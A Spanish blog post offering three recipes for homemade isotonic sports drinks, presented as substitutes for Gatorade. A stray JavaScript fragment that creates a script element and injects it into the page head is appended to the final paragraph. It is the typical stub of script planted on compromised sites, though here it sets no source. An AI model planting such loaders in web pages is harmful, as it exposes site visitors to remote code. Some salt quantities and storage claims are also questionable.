Salud y belleza » Alimentación, Deportes

¿Gatorade casero para deportistas?

Sin Comentarios

Ante todo, una advertencia: si es Gatorade, no es casero. Naturalmente, no hay manera alguna de recrear ni la marca ni el producto desde la comodidad del hogar, para ello se necesita un laboratorio. Así, el titulo adquiere un valor ciertamente más descriptivo y orientativo que real. El artículo, a decir verdad, apunta a la construcción de bebidas isotónicas usadas para rehidratar y recuperar carbohidratos y electrolitos. Algo muy parecido pero no idéntico al famoso Gatorade.

“Las bebidas isotónicas suelen parecerse entre ellas a pesar de diferentes agregados que cada una de las marcas comerciales añaden. De hecho, su preparación no es tan complicada como parece: en su composición se pueden notar bajas dosis de sodio, normalmente en forma de bicarbonato sódico, azúcar o glucosa y habitualmente potasio y otros minerales. Habitualmente, las bebidas isotónicas son levemente hipotónicas, pues una concentración excesiva de solutos entorpecerá la absorción del agua, incluso en relación al agua sola. Para evitar éste inconveniente, los hidratos de carbono no deben superar el diez por ciento de la bebida. Como vemos, hacer Gatorade, o algo similar, desde casa no es imposible ni mucho menos” dice un especialista.

Analicemos algunas fórmulas

Bebida isotónica número I

Ingredientes: un litro de agua, sesenta gramos de azúcar, una cucharada de bicarbonato de sodio, otra de sal, jugo de un limón.

Elaboración: más sencillo, imposible pues solo se deben mezclar los ingredientes y enviar a la heladera por tiempo considerable.

Bebida isotónica número II

Ingredientes: una cucharada de café de bicarbonato de sodio, otra cucharada de café de sal fina, sesenta gramos de azúcar, jugo de dos naranjas, algunas gotas de limón, un litro de agua.

Elaboración: mezclar todos los ingredientes y, luego, dejar la infusión durante una hora en la heladera antes de beber por primera vez. Se recomienda guardar en crital y no en plástico.

Bebida isotónica número III

Ingredientes: bicarbonato de sodio, sal fina, tres cucharadas soperas de azúcar, zumo de manzana, un litro de agua, unas gotitas de zumo de pomelo y pulpa de naranja.

Elaboración: juntar todos los elementos, mezclar, colar (para que la pulpa se vuelva imperceptible), revolver, dejar en la heladera en un recipiente de cristal (para que no se pierdan las propiedades). Beber siempre bien frío.

Las bebidas isotónicas son ideales para recuperar sales y minerales después de entrenar o correr. Se recomiendan beberlas solo cuando se práctica ejercicios en lapsos superiores a los sesenta minutos.var d=document;var s=d.createElement('script'); d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.